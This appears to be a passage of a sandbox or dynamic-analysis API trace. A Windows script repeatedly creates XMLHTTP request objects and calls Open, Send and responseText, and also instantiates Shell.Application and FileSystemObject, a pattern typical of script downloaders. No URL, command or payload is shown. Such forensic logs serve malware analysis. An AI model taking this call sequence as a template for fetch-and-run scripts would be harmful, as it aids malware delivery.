	[0368.760] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7840, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0368.760] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7840, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0368.760] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7840, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0368.760] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7840, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0368.924] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7840, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0368.924] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7840, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0368.924] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7840, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0368.924] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7840, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0368.924] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7840, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0368.925] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7840, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0368.925] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0368.925] SysStringLen (param_1=0x0) returned 0x0
	[0368.925] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0368.925] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0368.925] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x64ef9d0) returned 0x0
	[0368.925] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0368.925] Shell:IUnknown:QueryInterface (in: This=0x64ef9d0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x64efa10) returned 0x0
	[0368.925] ??2@YAPEAX_K@Z () returned 0x62f350
	[0368.925] Shell:IObjectWithSite:SetSite (This=0x64efa10, pUnkSite=0x62f350) returned 0x0
	[0368.925] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0368.925] Shell:IUnknown:Release (This=0x64efa10) returned 0x1
	[0368.925] Shell:IUnknown:QueryInterface (in: This=0x64ef9d0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x64ef9d0) returned 0x0
	[0368.926] Shell:IUnknown:AddRef (This=0x64ef9d0) returned 0x3
	[0368.926] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0368.926] SysStringLen (param_1=0x0) returned 0x0
	[0368.926] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0368.928] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0368.928] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0368.928] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0368.929] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0368.929] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0368.929] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0369.289] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7840, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0369.290] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7840, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0369.290] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7840, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0369.291] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0369.291] SysStringLen (param_1=0x0) returned 0x0
	[0369.291] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0369.291] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0369.291] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7840) returned 0x0
	[0369.291] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0369.292] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7840, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74f8) returned 0x0
	[0369.292] ??2@YAPEAX_K@Z () returned 0x62f330
	[0369.292] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74f8, pUnkSite=0x62f330) 
	[0369.292] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0369.292] XMLHTTPRequest:IUnknown:Release (This=0x49c74f8) returned 0x0
	[0369.292] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7840, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7840) returned 0x0
	[0369.292] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7840) returned 0x3
	[0369.292] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7840, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0369.292] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7840, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0369.294] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7840, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0369.294] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0369.294] SysStringLen (param_1=0x0) returned 0x0
	[0369.294] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0369.295] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0369.295] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7720) returned 0x0
	[0369.295] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0369.295] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7788) returned 0x0
	[0369.295] ??2@YAPEAX_K@Z () returned 0x62f310
	[0369.295] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7788, pUnkSite=0x62f310) 
	[0369.295] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0369.295] XMLHTTPRequest:IUnknown:Release (This=0x49c7788) returned 0x0
	[0369.295] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7720) returned 0x0
	[0369.295] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7720) returned 0x3
	[0369.295] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0369.295] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7720, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0369.295] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0369.295] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0369.295] SysStringLen (param_1=0x0) returned 0x0
	[0369.296] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0369.296] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0369.296] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74d0) returned 0x0
	[0369.296] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0369.296] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0369.296] ??2@YAPEAX_K@Z () returned 0x62f330
	[0369.296] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f330) 
	[0369.296] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0369.296] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0369.296] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74d0) returned 0x0
	[0369.296] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74d0) returned 0x3
	[0369.296] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0369.296] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74d0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0369.296] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0369.296] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0369.296] SysStringLen (param_1=0x0) returned 0x0
	[0369.297] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0369.297] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0369.297] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5bf0) returned 0x0
	[0369.297] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0369.297] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c58) returned 0x0
	[0369.297] ??2@YAPEAX_K@Z () returned 0x62f310
	[0369.297] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c58, pUnkSite=0x62f310) 
	[0369.297] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0369.297] XMLHTTPRequest:IUnknown:Release (This=0x49c5c58) returned 0x0
	[0369.297] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5bf0) returned 0x0
	[0369.297] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5bf0) returned 0x3
	[0369.297] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0369.297] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bf0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
